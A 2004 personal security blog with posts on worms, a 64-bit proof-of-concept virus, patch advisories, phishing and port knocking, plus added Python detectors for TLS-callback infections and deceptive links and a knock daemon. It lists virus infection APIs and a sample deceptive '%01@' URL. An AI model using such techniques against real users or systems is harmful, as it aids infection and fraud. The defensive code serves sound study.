You would think that if someone you know wanted to be silly and post dumb comments on your blog, they would at least attempt to hide the fact that it is them.

I've just noticed another stupid comment which has wasted my time (all 5 seconds of it) to delete. It's not the first time, but since it has just been posted and I know the hostname, who is in the office right now, who knows about my blog and who has posted before - I have a good idea of who it is.

I'm not annoyed - I just think it is stupid.
I'd block this site from even being viewed by work addresses, but that ruins it for everyone, so does blocking posting from those addresses.

Sounds like you need me to give you some tips in the art of hiding in the shadows as you were busted before, but I just didn't bother discussing it.

UPDATE: 04/06/04

Since reserved address space is now being used to post, I know exactly who could make that work, which means even if that knowledge was passed on, I know where it originated.

1 point for having a single skill. 2 points for making me laugh at the personal comments, 3 points for being lame. It's funny that person wouldn't say anything to my face but instead has to resort to electronic foul mouthing.

Lamers never admit it, let me see if I am wrong in this case.

Post ID: 399, posted by jase at 03:05 AM

Saturday, May 29, 2004

First 64 bit Windows virus

It seems that the first virus which can infect 64 bit Windows systems has been spotted in the wild. The code, which is proof of concept, uses the Thread Local Storage (TLS) structures to execute the viral code: TLS callbacks are run by the Windows loader before the image's entry point, which is what makes them a convenient place to put an infection's startup code.

The virus is written in IA64 assembly language; it will not run on 32 bit systems, but will run on 32 bit systems running 64 bit emulation.

It uses a small number of Win64 APIs from the following libraries:

NTDLL.DLL
SFC_OS.DLL
KERNEL32.DLL

From NTDLL.DLL, it uses these functions:

LdrGetDllHandle()
RtlAddVectoredExceptionHandler()
RtlRemoveVectoredExceptionHandler()

To avoid crashing during infection, vectored exception handling is used: a malformed or unexpected file then lands in the handler, which can back out of the infection, rather than killing the host process and drawing attention.

The SfcIsFileProtected() function of SFC_OS.DLL is used to avoid infecting executables that are protected by the System File Checker (SFC).

The following 16 functions are used from KERNEL32.DLL to implement a standard file infection of an IA64 portable executable image:

CreateFileMappingA()
CreateFileW()
CloseHandle()
FindFirstFileW()
FindNextFileW()
FindClose()
GetFullPathNameW()
GetTickCount()
GlobalAlloc()
GlobalFree()
LoadLibraryA()
MapViewOfFile()
SetCurrentDirectoryW()
SetFileAttributesW()
SetFileTime()
UnmapViewOfFile()

For the full details, see the Symantec bulletin.
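Because TLS callbacks run before the entry point, a scanner that only looks at AddressOfEntryPoint will miss this kind of infection; it has to walk the TLS directory. What follows is an added example, not code from this post or from Symantec: a small PE32+ parser that lists the TLS callbacks of an image and flags any that point into a non-executable section, which is where appended viral code usually ends up. The image it builds is a constructed minimal IA64 file with two callbacks, not the virus itself, and the section names, addresses and image base are assumptions chosen for the example.

```python
import struct

# PE constants (from the PE/COFF specification)
IMAGE_FILE_MACHINE_IA64 = 0x0200
IMAGE_DIRECTORY_ENTRY_TLS = 9
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PE32PLUS_MAGIC = 0x20B


def parse_pe(data):
    """Return machine, image base, entry RVA, data directories and section table of a PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24                                           # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):                                      # section table sits right after the optional header
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, max(vsize, rawsize), rawptr, chars))
    return {"machine": machine, "image_base": image_base, "entry_rva": entry_rva,
            "dirs": dirs, "sections": sections}


def section_for_rva(pe, rva):
    for sec in pe["sections"]:
        if sec[1] <= rva < sec[1] + sec[2]:
            return sec
    return None


def rva_to_offset(pe, rva):
    sec = section_for_rva(pe, rva)
    if sec is None:
        raise ValueError("RVA 0x%x not backed by any section" % rva)
    return sec[3] + (rva - sec[1])


def tls_callbacks(data):
    """Virtual addresses in the TLS directory's AddressOfCallBacks array (NULL terminated)."""
    pe = parse_pe(data)
    if len(pe["dirs"]) <= IMAGE_DIRECTORY_ENTRY_TLS:
        return []
    tls_rva, _ = pe["dirs"][IMAGE_DIRECTORY_ENTRY_TLS]
    if tls_rva == 0:
        return []
    # IMAGE_TLS_DIRECTORY64: StartAddressOfRawData, EndAddressOfRawData, AddressOfIndex,
    # AddressOfCallBacks (all virtual addresses), SizeOfZeroFill, Characteristics
    _, _, _, callbacks_va, _, _ = struct.unpack_from("<QQQQII", data, rva_to_offset(pe, tls_rva))
    if callbacks_va == 0:
        return []
    off = rva_to_offset(pe, callbacks_va - pe["image_base"])
    found = []
    while off + 8 <= len(data) and len(found) < 64:             # cap guards against a missing terminator
        va = struct.unpack_from("<Q", data, off)[0]
        if va == 0:
            break
        found.append(va)
        off += 8
    return found


def suspicious_tls_callbacks(data):
    """Callbacks that do not land in an executable section: code hiding in data is a classic infection sign."""
    pe = parse_pe(data)
    bad = []
    for va in tls_callbacks(data):
        sec = section_for_rva(pe, va - pe["image_base"])
        if sec is None or not sec[4] & IMAGE_SCN_MEM_EXECUTE:
            bad.append(va)
    return bad


def build_sample_image():
    """Constructed minimal IA64 PE32+ image with two TLS callbacks (not real malware)."""
    base = 0x140000000                                          # assumed image base
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_IA64, 2, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)                     # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, base)                       # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)             # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x3000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_TLS, 0x2000, 40)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sect += struct.pack("<8sIIIIIIHHI", b".tls", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0")
    text = bytes(0x200)                                         # code section; contents do not matter here
    tls = bytearray(0x200)
    struct.pack_into("<QQQQII", tls, 0, base + 0x2080, base + 0x2090, base + 0x2070, base + 0x2040, 0, 0)
    # callback array at RVA 0x2040: one into .text (legitimate), one into the data section (suspicious)
    struct.pack_into("<QQQ", tls, 0x40, base + 0x1100, base + 0x2100, 0)
    return headers + text + bytes(tls)


if __name__ == "__main__":
    img = build_sample_image()
    print("callbacks :", [hex(v) for v in tls_callbacks(img)])
    print("suspicious:", [hex(v) for v in suspicious_tls_callbacks(img)])
```

Pointing `tls_callbacks()` at a real file (`open(path, "rb").read()`) works for any PE32+ image; PE32 files would need the 32-bit layout of the optional header and TLS directory, which the parser deliberately rejects rather than misreads.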

Post ID: 393, posted by jase at 12:27 AM
Permalink | Post / View Comments (0) | TrackBack ID: 366, (0) | Google Search

Tuesday, May 25, 2004

Microsoft site defaced

Obviously MS has not been keeping the patches applied on its own web servers, or at least there is a new vulnerability that has been exploited. The main MS site has been defaced slightly: not on the front pages, but a more subtle modification, presumably to go unnoticed for longer.

More details are yet to follow, but indeed it is another blow for MS, with regards to security and the fact that even their own site can be hacked, which is not something new as it has happened before.

When will they learn?

Post ID: 388, posted by jase at 09:53 PM
Permalink | Post / View Comments (0) | TrackBack ID: 361, (6) | Google Search

Wednesday, May 19, 2004

CVS & Subversion bugs

The flaw relating to CVS affects all versions of the software released before May 19 2004.
The heap overflow occurs because user-supplied data is not properly validated before it is used. The CVS Project and various vendors have already posted advisories and patches.

The Subversion issue is much easier to exploit; it is caused by an error in the way the code parses dates, which could allow remote code execution.

If you use CVS or Subversion, update or patch!

Post ID: 382, posted by jase at 03:52 PM
Permalink | Post / View Comments (0) | TrackBack ID: 355, (0) | Google Search

Friday, May 14, 2004

Dabber

A new worm called Dabber appears to be spreading via a vulnerability in the recent Sasser worm. Dabber is different, in that it is one of the first to spread by exploiting an actual programming error in another worm.

Dabber scans for Sasser-infected hosts on port 5554, the port Sasser's own FTP server listens on. If it finds one, it uses an exploit for the buffer overflow in that FTP server to take control of the box.

After Dabber has installed itself it deletes the registry keys of Sasser and other worms / viruses, and opens port 9898 as a backdoor. To remove Dabber, you need to kill the "package.exe" process, delete the file and remove the "sassfix" registry key.

It can be found in the following locations:

%System%\package.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\package.exe

%Windir%\All Users\Main menu\Programs\StartUp\package.exe

It appears to delete a list of entries from other registry keys; check out the Symantec Alert for full details. It looks like this might be another trend, as obviously even malicious code has bugs.

Post ID: 377, posted by jase at 04:22 PM
Permalink | Post / View Comments (0) | TrackBack ID: 350, (0) | Google Search

Tuesday, April 27, 2004

Infosec visit

I headed down to London last night to attend Infosec today. I've finally made it, after saying I'd go every year for about the past 4 or 5 years. It was as expected: companies showing off their products and such. I did manage to make it to one of the seminars, an MS one, which was quite good.

The thing that made me laugh was, whilst visiting the Juniper Networks / Netscreen stand and having a play around with some software on one of the demo systems, there was a PuTTY terminal open, which I maximized to find there sitting in front of me a root shell. The IP address was a reserved one, in the 10 range, so I'd assume that this box was part of the stuff on the stand.

I could have caused them some problems and/or had some fun, but I didn't bother. I thought, that's too easy. I didn't report it to them though, so someone else might have had some fun instead. It's not something you would like to see, even in this type of environment: it gives off the wrong impression to potential and existing customers regarding Juniper's stance on security, even more so since this is a security related conference.

Post ID: 358, posted by jase at 11:10 PM
Permalink | Post / View Comments (0) | TrackBack ID: 332, (3) | Google Search

Thursday, April 15, 2004

Loads of vulnerabilities

As we have all seen over the past few days, Microsoft have released a host of security patches to fix no fewer than 20 security issues recently discovered in a selection of their software products.

Everything from Windows 2000, XP and Windows Server 2003 to Outlook and Internet Explorer is affected in one way or another. 8 of the security issues are classed as critical and users are advised to update as soon as possible via Windows Update.

There have been some performance issues with Windows Update since the monthly update as so many users were trying to update.

Check out a full low down on the bugs here & here.

But more importantly, patch.

Post ID: 345, posted by jase at 09:31 AM
Permalink | Post / View Comments (0) | TrackBack ID: 319, (1) | Google Search

Wednesday, April 14, 2004

Who would fall for this?

Ok, so we've all probably heard about the phishing going on at the moment, spam mails reported as being from banks.

If you fall for this one - you are proven to be stupid!

Well, it's obvious when you're not a customer of the bank that the mail must be fake, but some of the ones going around that I have received do look pretty good and can fool people. I get ones from Barclays quite a bit. I'm a Barclays account holder but I obviously know it's all fake.

This is the latest I've received - what a joke!
Surely, nobody would fall for this one?
The sad thing is, I bet I am wrong.

Some people think it must be from the bank, since nobody else is going to know you are a customer of the bank. Well, you would be right, they don't, but these mails are sent out on a mass basis and out of, say, 10,000, a percentage of those receiving the mail will be an online banking customer of the bank in question.

---
Hello dear client Barclays Bank.
Today our system of safety at night has been cracked!!!
It not a joke!!! It is the truth!!!
We ask you, in order to prevent problems, to repeat
registration of your data. Make it very quickly!
Administration Barclays Bank.

http://ibank.barclays.co.uk
---

Obviously it's a specially crafted link that sends you to another site even though the URL can show up as being correct for the bank in Outlook. Some of these issues are due to bugs in Outlook/Express and IE; patches are available, but the majority of people (read: average computer user) won't have updated. The only reliable check is to ignore the link text entirely and look at where the href actually points, or better still, type the bank's address in yourself.
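The trick in this kind of mail is that the visible link text and the real destination differ, sometimes helped by putting the bank's name in the user-info part of the URL in front of an `@`, or by the percent-encoded control character (`%01`) that hid everything after it in unpatched IE address bars (the issue Microsoft addressed in MS04-004). The following is an added example, not code from this post: it pulls every link out of an HTML mail body and reports the mismatches. The sample mail, the 203.0.113.x address and the check names are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample in the style of the mail quoted above; 203.0.113.5 is a documentation address.
SAMPLE_MAIL = """\
<p>Hello dear client Barclays Bank. Make it very quickly!</p>
<p><a href="http://ibank.barclays.co.uk%01@203.0.113.5/update/">http://ibank.barclays.co.uk</a></p>
<p><a href="http://www.barclays.co.uk/">http://www.barclays.co.uk/</a></p>
<p><a href="http://203.0.113.5/">click here</a></p>
"""

# Visible text that a reader would take to be an address (optional scheme, a dotted host, optional path)
URL_LIKE = re.compile(r"(https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(/\S*)?")


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Host a browser actually connects to: anything before '@' is user info, not the host."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def check_link(href, text):
    """Reasons a link looks deceptive (an empty list means nothing was found)."""
    reasons = []
    parts = urlsplit(href if "://" in href else "http://" + href)
    if parts.username is not None:
        reasons.append("user info before '@': real host is %s, not %s" % (parts.hostname, parts.username))
    if re.search(r"%[01][0-9A-Fa-f]", href.split("?", 1)[0]):       # %00-%1F before any query string
        reasons.append("percent-encoded control character in the URL (the %01 address bar trick)")
    if URL_LIKE.fullmatch(text) and host_of(text) != host_of(href):
        reasons.append("visible text says %s but the link goes to %s" % (host_of(text), host_of(href)))
    return reasons


def scan_mail(html):
    """Return [(href, text, reasons)] for every link that trips at least one check."""
    extractor = LinkExtractor()
    extractor.feed(html)
    findings = []
    for href, text in extractor.links:
        reasons = check_link(href, text)
        if reasons:
            findings.append((href, text, reasons))
    return findings


if __name__ == "__main__":
    for href, text, reasons in scan_mail(SAMPLE_MAIL):
        print(href, "<-", repr(text))
        for reason in reasons:
            print("   ", reason)
```

Note that the "click here" link is not reported: its text makes no claim about the destination, so there is nothing to contradict, which is why a mismatch check is only one of the signals a mail filter should use.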

Post ID: 344, posted by jase at 10:43 AM
Permalink | Post / View Comments (0) | TrackBack ID: 318, (6) | Google Search

Tuesday, April 13, 2004

New Apache vulnerabilities

There are a few new bugs reported & users of affected versions would be advised to upgrade.

One is a DoS which affects Apache 2; the issue has been fixed in release 2.0.49.

The other issue is not remote like the one above but local only; it affects 1.3.x and 2.x, although 1.3.29 is said not to be affected. Most vendors have released patches already, but you could just download the latest versions of Apache instead.

Availability of exploits is currently unknown to me, but it's good practice to upgrade anyway.

Post ID: 342, posted by jase at 11:06 PM
Permalink | Post / View Comments (0) | TrackBack ID: 316, (5) | Google Search

Tuesday, March 23, 2004

Possible Gnome.org server compromise

The Gnome project has announced that the main server hosting the project may have been compromised. Nothing has been confirmed yet, as investigations are taking place.

Of course all downloaded code can be verified by MD5 checksum, but only against checksums obtained from somewhere other than the possibly compromised server: an attacker who can replace the tarballs can replace the checksum files sitting next to them just as easily, so a detached GPG signature checked against a key you already had is the real test. We'll have to wait for the reports.

See the announcement.

Wednesday, February 25, 2004

OpenSSH 3.8 released

OpenSSH version 3.8 has been released which contains various bug fixes and also a number of new features, which include:

* Support for sending application layer keep-alive messages to the server (ServerAliveInterval).
* Forced changes of expired passwords via passwd.
* Untrusted cookies are now used for X11 forwarding; this can break some X applications, and ForwardX11Trusted restores the old behaviour.
* Improved sftp batch file support.
* Support for host keys in DNS (VerifyHostKeyDNS).
* GSSAPI support replaced with "gssapi-with-mic" to fix a man-in-the-middle weakness in the original "gssapi" method.

As well as more bug fixes and memory leak fixes. Although not mandatory, if you can see the new features being of use and you have the desire, go ahead and upgrade.

Post ID: 286, posted by jase at 11:25 PM
Permalink | Post / View Comments (0) | TrackBack ID: 261, (0) | Google Search

More secure with XP SP2

Bill Gates has outlined various improvements that will be made to systems when users update to service pack 2 after its release. Changes such as switching on the firewall will be welcomed, as the number of people who don't have much of a clue about computers and leave their systems unpatched, sitting online launching DDoS attacks and various other things, will be reduced.

If the firewall is enabled then the worms and trojans won't be able to connect in the first place; or at least, if most users of XP upgrade to service pack 2, future worms that exploit vulnerabilities in network services, as Blaster did with RPC/DCOM, will not be able to spread at such a rate.

I would have thought that Microsoft would have included some AV and firewall technology in Windows a long time ago. The firewall is there to be used, but is not enabled by default; why? Something that allows automatic updates to rules and definitions, as with Symantec products for example, would have proven effective against some of the backdoors and such like that we have seen in recent times.

It can only be a good thing that MS are adopting this approach now, even though a bit late; it will be an improvement. On the other hand, I think the monthly updates are a bit stupid, especially if critical updates to patch vulnerabilities are also only published as part of the monthly updates. One would expect that critical patches would be made available as soon as possible, while other things that did not have such an impact could be worked on over a longer period of time.

Given that some vendors release patches straight away and work on fixing bugs as soon as they are notified, it only seems fair that a company the size of MS should invest more time and money to ensure that security is at the top of the priority list. It could only be Microsoft that has been notified about various bugs in applications such as Internet Explorer and Windows, yet has failed to release fixes a long time after being notified.

If the general computing world decided not to accept the current state of affairs, I'm sure that more effort would be made. Things will have to change and it seems they are beginning to.

Post ID: 285, posted by jase at 03:39 AM
Permalink | Post / View Comments (0) | TrackBack ID: 260, (0) | Google Search

Tuesday, February 17, 2004

RC5-72 distributed.net project

I'm sure you are all aware of the challenges that RSA Security set to crack encrypted messages, which allow us to understand how secure a specific algorithm is in practice. Distributed.net works on these projects by means of distributed computing and brute force.

I've worked on previous projects in the past such as RC5-64, back in 1998, and I continued to work on it until completion. I had the advantage of having a lot of machines at college working on the project for me, and at the peak I usually had around 5-10,000 blocks a day being submitted, which all went to the team I was part of (alt.ph.uk). Looking at the stats, I can see that in total I submitted 832,603 blocks, not bad at all.

I've recently started working on RC5-72, but this time I have the advantage of using 2 Sun Fire V880s, which both have 8 UltraSPARC-III processors and 32GB of RAM, as well as a few other P4/Athlon XP based machines.

distributed.net client for Solaris Copyright 1997-2003, distributed.net
RC5-72 SPARC assembly by Didier Levet and Andreas Beckmann
Please visit http://www.distributed.net/ for up-to-date contest information.

dnetc v2.9005-484-CTR-03042808 for Solaris.
Please provide the *entire* version descriptor when submitting bug reports.
The distributed.net bug report pages are at http://www.distributed.net/bugs/

[Feb 18 13:55:01 UTC] Automatic processor detection found 8 processors.
[Feb 18 13:55:01 UTC] Loading crunchers with work...
[Feb 18 13:55:01 UTC] Automatic processor type detection found an UltraSPARC-III processor.
[Feb 18 13:55:01 UTC] RC5-72: using core #5 (AnBe 2-pipe).
[Feb 18 13:55:01 UTC] RC5-72: Loaded 53:9A5FEBB8:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9947E99C:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9583A941:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:9B417340:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:98C860A2:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:02 UTC] RC5-72: Loaded 53:90F00E5E:00000000:1*2^32 (6.70% done)
[Feb 18 13:55:03 UTC] RC5-72: Loaded 53:98DFFC29:00000000:1*2^32 (7.00% done)
[Feb 18 13:55:03 UTC] RC5-72: Loaded 53:9E7DB352:00000000:1*2^32 (6.80% done)
[Feb 18 13:55:03 UTC] RC5-72: 192 packets (192.00 stats units) remain in buff-in.r72
[Feb 18 13:55:03 UTC] RC5-72: 0 packets are in buff-out.r72
[Feb 18 13:55:03 UTC] 8 crunchers ('a'-'h') have been started.
.....10%.....20%.....30%.....40%.....50%.....60%.....70%.....80%.....90%....100

snip ..

[Feb 18 14:33:05 UTC] RC5-72: Completed 53:90F00E5E:00000000 (1.00 stats units) 0.00:38:02.27 - [1,755,119 keys/s]
[Feb 18 14:33:06 UTC] RC5-72: Loaded CA:8072EC53:00000000:1*2^32
[Feb 18 14:33:06 UTC] RC5-72: Summary: 8 packets (8.00 stats units) 0.00:38:07.08 - [14.00 Mkeys/s]
[Feb 18 14:33:07 UTC] RC5-72: 184 packets (184.00 stats units) remain in buff-in.r72
Projected ideal time to completion: 0.15:26:31.00
[Feb 18 14:33:07 UTC] RC5-72: 8 packets (8.00 stats units) are in buff-out.r72

That's 8 blocks done in no time already on the one Sun Fire, and the same amount is being kicked out on the other Sun Fire too. I wonder if I will be able to get my rate up to the level I had it at in the past? Anyway, if you're interested in joining and helping out by donating your idle CPU cycles then head on over to www.distributed.net. If you want to submit your blocks to the team I am part of then join up to Valve Media.

Post ID: 277, posted by jase at 02:03 PM
Permalink | Post / View Comments (0) | TrackBack ID: 252, (3) | Google Search

Monday, February 16, 2004

MS source code leak - bugs already

As expected, after the code leak there have already been some bugs discovered, which just goes to show how bug infested MS code probably is. If it was released to the open world, a lot more auditing could be done and the code would be a lot better.

The first bug was discovered some time ago, but a working exploit was not produced, or not released anyway. Days after the source appeared and started to spread quickly, a proof of concept exploit was released. The other bug found affects bitmap processing code in IE 5 and some versions of Outlook Express; a working exploit has also been released.

Since MS releases the source code to selected partners and such, maybe they should just do everyone a favour and release it to everyone. Or to more people at least, so a proper audit can take place, which would make things a lot better.

Bugs, some very complicated to reproduce, can still be discovered even with closed source. The debate about closed source being more secure, via security through obscurity, is pointless, as proven by these latest events.

I'm sure there will be more to come...

Post ID: 276, posted by jase at 10:31 PM
Permalink | Post / View Comments (0) | TrackBack ID: 251, (1) | Google Search

Friday, February 13, 2004

Windows 2000 source code leak

You would not think it, due to Source Safe and other measures, but MS Windows 2000 source has been leaked. But not from Microsoft, and it does not appear that all of it has got out.

It seems the code has been taken from a Linux box, so the types of protection used by MS will not have been in place, especially since the leak appears to have come from a third party called Mainsoft.

Details are limited at the moment, but MS have launched an investigation with the FBI. I would think that the most that is at risk for MS is intellectual property.

More information is available from Neowin & Betanews.

Post ID: 273, posted by jase at 07:25 PM
Permalink | Post / View Comments (0) | TrackBack ID: 248, (3) | Google Search

Thursday, February 12, 2004

Nachi-B aka Welchi

Yet another worm appears to have surfaced, spreading by exploiting the same vulnerability that Blaster did. It appears to be another one looking for MyDoom infections, which it cleans up if found. It also downloads the patches from Microsoft to fix the DCOM RPC service hole which allowed it to gain access.

These clean-up-another-infection worms seem to be appearing more often these days; it's kind of like a game various authors are playing, trying to outwit each other by releasing worms and viruses that clean up someone else's previous attempts.

In some respects this is good, especially if something like MyDoom was not programmed to self destruct and become dormant.

This new version of Nachi could cause problems, like the original did, in terms of the large amount of network activity generated. It creates a file called "svchost.exe" in Windows\System\Drives; the legitimate svchost.exe lives in the System32 directory, so the path is the tell.

A trojan that has just surfaced is called Mitglieder.H. It creates an SMTP proxy that listens on port 35555, which will be enjoyed by spammers, unfortunately, if it spreads a lot. It creates the following registry key:

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ssgrate.exe" = "%winsysdir%\system.exe"

It also creates [HKCU\SOFTWARE\DateTime].

This is another piece of malware that is exploiting the backdoor left by MyDoom. Even on the day MyDoom stops its attack on SCO.COM and stops spreading, the backdoor stays active, which will give rise to more variants and other things that use it. Given how high the number of infected hosts is and the rate at which MyDoom spread, I'm sure we will see a lot of side effects caused by other malware using the traces of MyDoom left behind.

Time to upgrade your AV again, if it's not done automatically.

Post ID: 269, posted by jase at 06:16 PM
Permalink | Post / View Comments (0) | TrackBack ID: 244, (3) | Google Search

Wednesday, February 11, 2004

Nokia Bluetooth vulnerabilities

I read the article on Slashdot on Tuesday about the bugs that have been found in certain Nokia handsets and their Bluetooth implementations. It seems a few flaws exist which can allow data to be extracted from your handset without you even knowing; another reason to keep Bluetooth switched off when not in use, especially if you have a handset which is vulnerable.

Check out Bluestumbler for the full low down on the bugs, or see the ZD Net article.

These issues are obviously raising concern as personal and confidential data could be extracted fairly easily. Nokia is aware of the issues, but won't really be able to do much about it with existing handsets unless people upgrade the firmware.

Phone contact details from the address book are amongst the data that could be extracted.

So turn off Bluetooth when not in use!

Post ID: 268, posted by jase at 11:38 PM
Permalink | Post / View Comments (0) | TrackBack ID: 243, (0) | Google Search

Tuesday, February 10, 2004

MyDoom-C aka Doomjuice & Vesser aka Deadhat

Yet more worms appear to be spreading around, these two looking for machines already infected by MyDoom and MyDoom-B. It seems that Doomjuice first appeared yesterday and Vesser was first picked up by AV firms on Saturday. MyDoom-C does not spread by email at all and doesn't launch an attack on SCO; instead it's going after Microsoft.

Doomjuice copies itself to the system directory, calling itself "intrenat.exe", and adds the following registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gremlin
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Gremlin

Vesser spreads via MyDoomA/B and also via the Soulseek network.

The following registry key is added:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KernelFaultChk

and the file "sms.exe" is added to the machine. It removes any previous MyDoom infections from the machine and spreads via Soulseek by adding itself as various files to the shared directory. There appears to be an IRC backdoor and a remote update feature. It also tries to kill processes with certain names, common AV applications and scanners.

Go and update your signature files now.

Post ID: 266, posted by jase at 01:52 PM
Permalink | Post / View Comments (0) | TrackBack ID: 241, (2) | Google Search

Sunday, February 8, 2004

Port Knocking

I just noticed a post on /. about this idea. From what has been said so far it could be quite a handy security measure and would add to the existing security measures we all have in place. There is plenty of information regarding this on portknocking.org.

So the idea behind it?

Well, you connect to a certain sequence of ports in a certain order and boom, you are then allowed to connect to a specific service. For example, you could not only run ssh on a different port but also only allow connections to the ssh daemon after the correct knocking has been done. It could be incorporated with a firewall which adds dynamic rules on demand, so you can connect to the SSH server from your current host for a certain time period after the knock; afterwards the firewall rule is removed and you can no longer connect.

The port to which you finally connect could also be dynamic and change with each use, which also increases security. Users could use a script to initiate the knocking automatically so no extra work is needed. I think there is a lot that could be done with this; it looks like an interesting project. Obviously it's only going to be of use in certain situations and for certain services where only known users will be connecting. One caveat: a fixed knock sequence is visible to anyone who can sniff the path and can simply be replayed, so it hides a service rather than authenticating the client, and the real authentication still has to be done by the service behind it.

For services like http and smtp, which are generally public, there would not be much use. But for private services such as SSH, POP3 or non-anonymous FTP, for example, this is perfect. There is a lot of information on the site; I'm going to have a full read later. Make sure you check it out.
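The mechanism described above, as an added example that is not part of the original post or of portknocking.org's software: a knock daemon that tracks each source's progress through the sequence, opens the protected port for a limited time once the sequence completes within the window, and records the firewall changes it would make. The ports, the window, the lifetime, the iptables rule shape and the client addresses are all assumptions for the example. The sequence is deliberately non-monotonic (7000, 9000, 8000), because a sequential port sweep hits 7000, 8000 and 9000 in that order and would otherwise knock its way in by accident.

```python
# Assumed parameters: pick your own ports, but keep the sequence non-monotonic (see below).
KNOCK_SEQUENCE = (7000, 9000, 8000)
KNOCK_WINDOW = 5.0      # seconds allowed to complete the whole sequence
OPEN_FOR = 30.0         # seconds the protected port stays reachable after a good knock
PROTECTED_PORT = 22


def rule_command(action, src, port=PROTECTED_PORT):
    """iptables command the daemon would run to open or close the hole for one source."""
    flag = "-I" if action == "open" else "-D"
    return "iptables %s INPUT -p tcp -s %s --dport %d -j ACCEPT" % (flag, src, port)


class KnockDaemon:
    """Tracks knock progress per source and keeps a time-limited allow list."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW, open_for=OPEN_FOR):
        self.sequence = tuple(sequence)
        self.window = window
        self.open_for = open_for
        self.progress = {}      # src -> (index of the next expected knock, time of the first knock)
        self.opened = {}        # src -> time at which the hole closes again
        self.actions = []       # (ts, "open" | "close", src): the firewall changes made

    def expire(self, now):
        """Close any holes whose lifetime has run out."""
        for src, until in list(self.opened.items()):
            if now >= until:
                del self.opened[src]
                self.actions.append((now, "close", src))

    def observe(self, ts, src, dport):
        """Feed one inbound connection attempt (timestamp, source, destination port), e.g. from firewall logs."""
        self.expire(ts)
        if dport not in self.sequence:
            return                              # not a knock port: ignore it
        idx, started = self.progress.get(src, (0, ts))
        if idx and ts - started > self.window:
            idx = 0                             # too slow: start again
        if dport == self.sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
        else:
            # Wrong port for this step: reset. A sweep arriving in numeric order (7000, 8000, 9000)
            # fails here on 8000 and never completes a non-monotonic sequence.
            idx, started = (1, ts) if dport == self.sequence[0] else (0, ts)
        if idx == len(self.sequence):
            self.opened[src] = ts + self.open_for
            self.actions.append((ts, "open", src))
            self.progress.pop(src, None)
        elif idx:
            self.progress[src] = (idx, started)
        else:
            self.progress.pop(src, None)

    def is_open(self, now, src):
        """Would a connection from src to the protected port be allowed at time now?"""
        self.expire(now)
        return src in self.opened


if __name__ == "__main__":
    d = KnockDaemon()
    for t, port in ((0.0, 7000), (1.0, 9000), (2.0, 8000)):     # correct knock, within the window
        d.observe(t, "198.51.100.7", port)
    print("good client open:", d.is_open(2.5, "198.51.100.7"))
    for t, port in ((3.0, 7000), (3.1, 8000), (3.2, 9000)):     # sequential sweep
        d.observe(t, "203.0.113.9", port)
    print("port sweep open:", d.is_open(3.5, "203.0.113.9"))
    print("after expiry   :", d.is_open(40.0, "198.51.100.7"))
    for ts, action, src in d.actions:
        print("%5.1f  %s" % (ts, rule_command(action, src)))
```

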